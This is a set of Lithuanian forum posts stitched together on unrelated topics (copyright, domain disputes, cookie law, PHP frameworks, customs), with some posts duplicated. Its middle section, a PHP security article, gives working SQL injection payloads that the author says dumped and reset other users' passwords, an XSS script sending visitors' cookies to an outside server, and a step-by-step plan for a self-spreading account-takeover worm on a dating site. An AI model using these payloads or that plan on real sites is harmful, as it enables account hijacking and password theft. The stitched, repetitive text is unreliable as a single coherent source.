heksagonas

Čia suplakta į vieną vietą keli skirtingi dalykai.
 
1. Autoriaus teisės atsiranda ir galioja nuo kūrinio sukūrimo, nepriklausomai kur nors registruota ar ne, yra koks nors ženkliukas ar ne.
 
2. © ženkliukas yra tiesiog informacinio pobūdžio, nurodantis kad autoriaus teisės galioja ir kam jos priklauso. Jo vartojimas nėra būtinas, bet tas, kas nusipirko kūrinį kartu su visomis turtinemis teisėmis, turi teisę dėti savo ©.
 
3. Autoriaus vardo teisė. Ji visiškai atskira nuo turtinių teisių. Pavyzdžiui pažiūrėkit kokį kompaktą - ant viršelio dainos autorius, o © ženkliukas - išleidusios firmos. Tai reiškia, kad turtinės teisės parduotos firmai, bet pareiga nurodyti autorių vistiek išliko. Bet autoriaus vardas gali būti ir visai nenurodomas, čia jau priklauso koks susitarimas buvo, apie tai jau rašiau.

Va čia ir problema, kad čia tavo sugalvota taisyklė, ir nei įstatymo raidė, nei teismų praktika jos nepatvirtina. Ir kiek aš klausiu - na pateik pavyzdžių, o ne tik savo išvedžiojimus, tu vistiek tą patį per tą patį. Jei tau nedaeina, tai aš suradau netgi tiesioginę strendimo citatą, sakančią priešingai:
 
"Atsižvelgiant į tai, jog, kaip jau buvo minėta, Lietuvos teisėje negalima rasti teisės normos, kuri tiesiogiai reguliuotų teisinę apsaugą (inter alia atitinkamų prekių ženklų savininkų) nuo neteisėto ir nesąžiningo prekių ženklo panaudojimo domeno.lt varduose, ir LR Prekių ženklų įstatymas nereglamentuoja tokio pobūdžio santykių, nagrinėjamu atveju be minėtos LR Prekių ženklų įstatymo normos, yra būtina pasitelkti teisės analogiją bei tarptautinę teisę ir praktiką"
 
Štai - juodu ant balto pasakyta, kad vien Prekių ženklų įstatymo, kad panaikinti domeną, nepakanka. Ir teismai taiko reglamentą ne kaip kokią papildomą aplinkybę, šiaip iš neturėjimo ką veikti, bet kaip bylos pagrindą. O ta prekių ženklų nuostata cituojama tik kaip sąlyga reglamento taikymui, nes pats reglamentas numato, kad norint panaikinti, pirmiausia turi būti nustatyta, kad domenas tapatus ar panašus į prekės ženklą. O reglamente būtina sąlyga - nesąžiningumas, ir visose bylose jis ir yra nustatytas.
 
Bet ne, pasakei nesamonę ir dabar daužai galvą į sieną, pritempinėji tam netinkančias normas, iškraipai ir savaip interpretuoji teismų sprendimus, kad vistiek kaip nors tą savo susigalvotą taisyklę pateisinti.
 
Taip kad taisyklė, trumpai tariant, tokia - be nesąžiningumo laimėsi prieš prekės ženklą, o prieš domeną - ne.

Greičiausiai atims. Domėnus atima ne dėl panašumo, o dėl nesąžiningos konkurencijos. T.y. tu gali turėti visai identiška domėną, bet jei nesąžiningos konkurencijos nebus - neatims. Va pavyzdžiui kad ir to pačio svyturio.lt atveju, jei ten būtų tiesiog informacija apie Lietuvoje esančius svyturius - nebūtų atėmę. Bet jei naudosi identišką ar labai panašų domėną su tikslu suklaidinti vartotoją, tada jau bus nesąžininga konkurencija ir atims. Tavo atveju ir domėnas labai panašus ir klaidinimas akivaizdus - nėra jokio kito tikslo tokį domėną pirkti, kaip tik kad jiems parduoti. Taip kad jei norės su tavim terliotis - atims, nebent nekreips dėmesio.

Žiūriu čia daug kas užsikabino būtent už cookies. Įstatymas tai ne cookies naudoti draudžia. Apie cookies čia pakomentavo advokatas, kaip apie vieną iš varijantų, kuris bus draudžiamas. O įstatymas sako - draudžiama kaupti informaciją be vartotojų sutikimo. Tai nesvarbu kaip tu tą vartotoją identifikuosi ir kur tą informaciją rašysi - ar į sesiją, ar į db, bet vien tai, kad tu kažkokiu būdu vartotoją identifikuosi ir apie jį informaciją kaupsi, jau yra pažeidimas. Taip kad teoriškai draudžiami ir visi kiti būdai.
 
Iš kitos pusės, sesija ir cookie tai dar savaime nereiškia duomenų kaupimo. Kaip matau, čia labiausiai piktinasi reklamos tiklai, kurie cookie būtent ir naudoja varototojo identifikavimui, kad apie jį duomenis rinkti ir tikslinę reklamą rodyti.
Standartinėje php sesijoje, tai į cookie įrašoma ne kažkoks varotojo id, o sesijos id. O duomenys saugomi tekstiniame failiuke serveryje. O praeina 15 minučių be jokio paspaudimo - ir viskas išsivalo. Ir kai tas pats vartotojas ateina sekantį kartą - generuojamas naujas sesijos id ir jokio ryšio nebelieka. Tai čia, manyčiau, nėra duomenų kaupimas pagal šitą įstatymą. Va jei pats į cookie įrašysi kažkokį vartotojo id, kad sekantį kartą jį atpažintum - tada jau bus. Bet jei neleisti net saugoti tokių laikinų duomenų to prisijungimo metu, tai tada iš viso absurdas gautųsi, dauguma puslapių nebegalėtų funkcionuoti, nes jokie nustatymai, kaip pavyzdžiui kalba, valiuta, prekių rūšiavimo ar vaizdavimo pasirinkimai, anksčiau peržiūrėtos prekės, neišsisaugotų. Paspaudęs kiekvieną puslapį viską turėtum pasirinkinėti iš naujo.

Kas nutiktų, jei kiekvienas pasaulio gyventojas turėtų po automatinį ginklą? Turbūt įsivyrautų anarchija ir chaosas.
 
PHP yra viena iš lengviausiai įsisavinamų programavimo kalbų, o atsižvelgiant į tai, kad nuolat didėja žmonių žingeidumas ir domėjimasis IT, tai dažnas jų bando kurti web sprendimus, kas ir yra (web sprendimai) tie automatiniai ginklai apie kuriuos užsiminiau.
 
Programos yra skirtos apdoroti ir dirbti su dideliais duomenų kiekiais, o informacijos valdymas šiais laikais ir yra didžiausias ginklas, juk ne veltui sakoma – kas valdo informaciją, tas valdo pasaulį. Kasdien mes registruojamės įvairiuose interneto platybių vietose ir ten pateikiame savo duomenis, slaptažodžius. O kas būtų, jei vieną dieną visai tai būtų paviešinta? Turbūt nieko gero...
 
O dabar prie techninių detalių. Iš patirties galiu pasakyti, kad būdų (kalbu apie web) rasti priėjimą prie įmonės duomenų yra N, bet šįkart norėčiau aptarti dažniausiai pasitaikančius du, kurie yra lengviausiai aptinkami ir išnaudojami.
 
SQL injection
 
SQL injekcijos tikslas yra išnaudoti galimybę pateikti formos arba GET užklausos kintamajį taip, kad galėtume pakoreaguoti originalią užklausą savo naudai. Niekada nemėgau teorijos ir visada buvau praktikas, tai tikiu, kad ir jums pavyzdys bus patogiau:
Taip atrodo kodas, esantis serveryje.

$vartotojas=$_POST[„user“]; $uzklausa="SELECT * FROM users WHERE name='$vartotojas’";
O kas būtų, jei vartotojo langelyje įrašytume
' or '1'='1 ?
Rezultatas gautųsi toks:

$uzklausa="SELECT * FROM users WHERE name='’ or ‘1’=’1’";
 
Suformavę tokią užklausą gauname, kad visada yra tenkinama sąlyga, nes 1 visada lygu 1. Tai buvo pats paprasčiausias pavyzdys, kuris pateikiamas kiekviename SQL injection straipsnyje, bet jei manote, kad viskas čia tuo ir apsiriboja, tai galiu pasakyti, kad klystate, nes realioje situacijoje tenka pakankamai pavargti, kartais ir paspėlioti, kol perprantama, kaip teisingai suformuoti užklausą.
 
Turiu vieną katalogą, kuriame kartais išsisaugau tokius dalykus, tai štai jums gyvenimiškesni pavyzdžiai:
 
Čia per slaptažodžio priminimo formą galėjau atsisiųsti kitų vartotojų slaptažodžius

' or email='[email protected]' union select '[email protected]',concat(email,':',DECODE(password,'client')) from clients limit 100,1 #
 
Čia per slaptažodžio keitimo formą galėjau pakeisti slaptažodį betkuriam vartotojui.

', 'site_administrators') or password=password AND id = '458' AND 'a'='a' #
 
Čia reikėjo sužinoti lentelės stulpelių pavadinimus žinant jos pavadinimą.

' limit 0 union select 1,(SELECT COLUMN_NAME FROM information_schema.COLUMNS WHERE TABLE_NAME='users' limit 0,1) COLLATE utf8_unicode_ci,3,4,5,6,7,8,9 from users where password!='admin' or '
 
Traukiu slaptažodžius

' limit 0 union select 1,(SELECT CONCAT(id,'|',namex,'|',passwordx,'|',permission,'|',email,'|',u_name,'|',u_surname,'|',company,'|',admin_title) FROM users limit 0,1),3,4,5,6,7,8,9 from users where password!='admin' or '
 
Aš čia tikrai nesurašysiu visų galimų atvejų, nes tai būtų neįmanoma, o kiekvienas toks potyris yra unikalus, bet noriu sudominti, kad domėtumėtės ir bandytumėte, nes jūs niekada neparašysite saugaus kodo, kol į viską nepažvelgsite iš tos kitos pusės – saugumo specialisto pusės.
 
XSS (Cross site scripting)
 

„<script>alert(„Jūs buvote nulaužtas“)</script> bla=”
 
Tai yra XSS atakos pavyzdys, bet jo panaudojimas yra pateiktas iš standartinių XSS pavyzdžių. Pirmiausiai aptarkime jo technines panaudojimo galimybes, o tada prieisime prie jo praktiškesnio panaudojimo galimybių.
 
HTML laukelis

<input type=”text” value=”<?=$_GET[‘kintamasis1’]?>”>
 
Suformuota užklausa

www.svetaine.lt/?kintamasis1=x“ <script>alert(„Jūs buvote nulaužtas“)</script
 
Rezultatas HTML’E

<input type=”text” value=”x” <script>alert(„Jūs buvote nulaužtas“)</script>“
 
Rezultatas svetainėje yra akivaizdžiai matomas – jums iššoks lentelė, kad buvote nulaužtas. Tačiau tai, kad jūs pamatysite tokią lentelę naudos neduoda, tačiau dažnai galima susidurti su problema, kai tokie duomenys yra išsaugomi duomenų bazėje ir jie atvaizduojami kitiems lankytojams. Bet vėl gi, kokia jums nauda, jei ši lentelė iššoks kažkam? Atsakymas paprastas – jokios.
 

<script>document.location='http://www.tavosvetaine.lt/skriptas.php?sesija='+document.cookie</script>
 
Štai čia ir prasideda visas įdomumas. Pateiktame pavyzdyje lankytojas yra nukreipiamas į jūsų svetainės skriptą, kuriam perduodamas lankytojo sesijos ID. Toliau yra tik vienas kelias. Jūsų skriptas turėdamas sesijos ID gali naudodamas CURL biblioteką prisijungti prie „aukos“ paskyros ir atlikti jums reikalingus veiksmus (keisti duomenis ir pan.).
 
Žinau, kad laukiate realaus pavyzdžio, tai jūsų negalima nuvilti. Anksčiau šis pažeidžiamumas egzistavo vienoje pažinčių svetainėje, kai savo anketos formoje galėjai įrašyti tokį kodą. Kaip tai buvo galima išnaudoti? Slaptažodžiai pas juos DB buvo nekoduojami (slaptažodžio priminimo funkcija atsiunčia ne naują slaptažodį, o esantį).
 
Eiga:

Patalpinama kodą savo anketoją ir paruošiame skriptą, kuris perims sesijos duomenis.
Užeiname į kelių narių anketas ir 90% jų aplanko tavąją.
Perimamme jų sesijos ID ir pakeičiame jų paskyros el. paštą į savo.
Atsisiunčiame slaptažodį.
El. paštą atstatome į originalų, kad liktume nepastebėti.
Jų anketoje įdiegiame kenksmingą javascript.

 
Rezultate gausime, kad kenksmingas kodas labai greit išplis per visų narių anketas, o į mūsų pašto dėžutę suplauks daugybė slaptažodžių.
 
Apibendriminas
 
Šį straipsnį rašiau ne tam, kad jis būtų panaudotas blogiems tikslams, bet atvirkščiai – kad taptumėte geresniais programuotojais. Pasirinkdami šią specialybė jūs privalote suprasti, jog jūsų rankose bus neįkainuojama informacija, kurią jums patikės jūsų darbdaviai, klientai, o vieną kartą juos nuvylę daugiau galite ir nebe susigrąžinti. Tikiuosi, kad šis straipsnis padės jums suvogti, jog neužtenka vien sukurti produktą, bet reikia, kad jis būtų ir saugaus, nes šiuolaikinis verslas yra informacijos verslas.
 
P.S Apmaudu, kad savo praktikoje teko susidurti su ne vienu vadovu, kurie investuoja didžiules sumas į produktų sukūrimą, bet visiškai neįvertina fakto, kad jų verslas gali būti sužlugdytas per 1 valandos saugumo auditą. Šioje vietoje įžvelgiu labai gerą verslo nišą, nes Lietuvoje yra tik kelios rimtos įmonės, kurios gali atlikti saugumo auditus, bet viskam savas laikas...

Tarp kitko, butent ir suprastum, kam reikalingas nuosavas frameworkas, jei ne pasiskaites, kas tai yra MVC, darytum, bet pats, net specialiai to nesiekdamas, o vykdydamas konkrecia uzduoti paciu zemiausiu lygmeniu, pamatytum kad gavosi MVC. Taip, savotiskas dviracio isradimas ir naujo, bet va tada tikrai suprastum kaip viskas veikia ir kam tie gudrus is knygu pazistami dalykai reikalingi, ir ka galima nuosavame padaryti geriau.

Ziurint koks tikslas yra. Jei padaryti kazkoki projekta - tada geriausia imti gatava frameworka. O jei tiesiog ismokti - vis tik, geriau bandyti paciam. Kiek nori narpliokis, bet, pabandes padaryti, atrasi tokiu dalyku, apie kokius anksciau ne nepagalvojai.
 
O siaip nuosavas frameworkas visada geriau, cia lygiai tas pats atvejis kaip opensourcine ar unikali tvs, tiesiog jei tokie klausimai kyla, jam dar ne laikas.

Kvailiausia cia, kad Facebooka apkaltino. Greiciausiai jis nei specialiai ieskojo per Facebooka auku, nei is viso planavo kad nuzudys. Durnius uzplauke ir tiek. Bet dabar visus gasdins koks Facebookas pavojingas.

Kvailiausia cia, kad Facebooka apkaltino. Greiciausiai jis nei specialiai ieskojo per Facebooka auku, nei is viso planavo kad nuzudys. Durnius uzplauke ir tiek. Bet dabar visus gasdins koks Facebookas pavojingas.

Ziurint koks tikslas yra. Jei padaryti kazkoki projekta - tada geriausia imti gatava frameworka. O jei tiesiog ismokti - vis tik, geriau bandyti paciam. Kiek nori narpliokis, bet, pabandes padaryti, atrasi tokiu dalyku, apie kokius anksciau ne nepagalvojai.
 
O siaip nuosavas frameworkas visada geriau, cia lygiai tas pats atvejis kaip opensourcine ar unikali tvs, tiesiog jei tokie klausimai kyla, jam dar ne laikas.

sveikas,
tavo problema labai panaši į vieną mūsų klientų, kuriam esame sukūrę e-shop valdymo sistemą.
iš to ką paminėjai problemose, nėra tiktais nuotraukos priskyrimo pagal atributą, bet šitą nesunkiai galima įdiegti.
 
kaip jau turbūt aišku, e-shop sprendimas tinkantis būtent Tau ir turi būti sukurtas būtent Tau. tada Tu turi tai ko Tau reikia ir nieko daugiau. Na bent jau tokia mano asmeninė nuomonė.

Cia viskas tvarkoj, nuo 52$ butent tiek mokesciu ir iseina. O is kur 52$ suzinojo - na, ne is dangaus nuleido, galbut buvo pridetas invoice, arba siuntinys tiek ivertintas, ar apdrausta tokiai sumai. Tu turek omenyje, kad mokesciai mokami nuo prekes vertes, o ne nuo tavo moketos sumos. Taip kad, supaprastintai snekant, muitine ir turi teise paskaiciuoti nuo tiek, kiek jiems pasirode. Aisku, kaip taisykle, patys vertinti nepuola, o paziuri kiek siuntinys ivertintas arba kas invoice parasyta, bet jei uzsispyres pradesi tvirtinti kad mokejai labai mazai, paprasciausiai parodys tau istatymo eilutes, kur parasyta, kad jie gali nustatyti prekes verte pagal palyginamasias kainu lenteles ir viskas.

Sveiki jaunieji programuotojai!
 
Kuriate PHP, Java, Delphi ar kita kalba? Norite išmokti daugiau? Turite klausimų, į kuriuos nežinote atsakymų?
 
Apsilankykite puslapyje www.myPCinfo.net ir Jūs pamiršite, ką reiškia "ieškoti"! Mes rasime atsakymus į visus Jūsų klausimus, susijusius su kompiuterinės programinės įrangos ir tinklapių kurimu.
 
Sistema testuojama išorėje. Todėl viskas šiomis dienomis nemokama.
 
Puslapis išverstas į lietuvių, anglų ir rusų kalbas. Klauskite taip, kaip Jums patogiau!
Laukiame Jūsų problemų - su nekantrumu norime jas išspręsti !!!
 

http://www.mypcinfo.net/answer/img/logo.gif

Sveiki, turiu ideja.
Yra tinklapis http://draugauk.net
Jis dar beta stadijoj, reikia pabaigti iki galo.
Darbo daug, reikia sienos panasios kaip FB.
Reikia prenumeratos naujienom, forumo temom, zaidimu komentarams ir kitoms vietoms, kur galima parasyt.
Zinuciu sistemos reikia kitokios.
Ir t.t..
 
Padarot ir jums atitenka reklamu plotai D, C, B.. Man paliekat tik A ir nuorodas. Susikuriat jiems atskira prisijungima, valdymas jau yra padarytas ir tai jusu uzdarbis. Tarkim susitariam, kad po darbo, jum tas pozicijas duodu ant 10 metu..
 
Negarantuoju, kad puslapis vaziuos ir pns. Tiesiog tai yra dar ideja.
 
Ka manot?
Ar domintu kanors?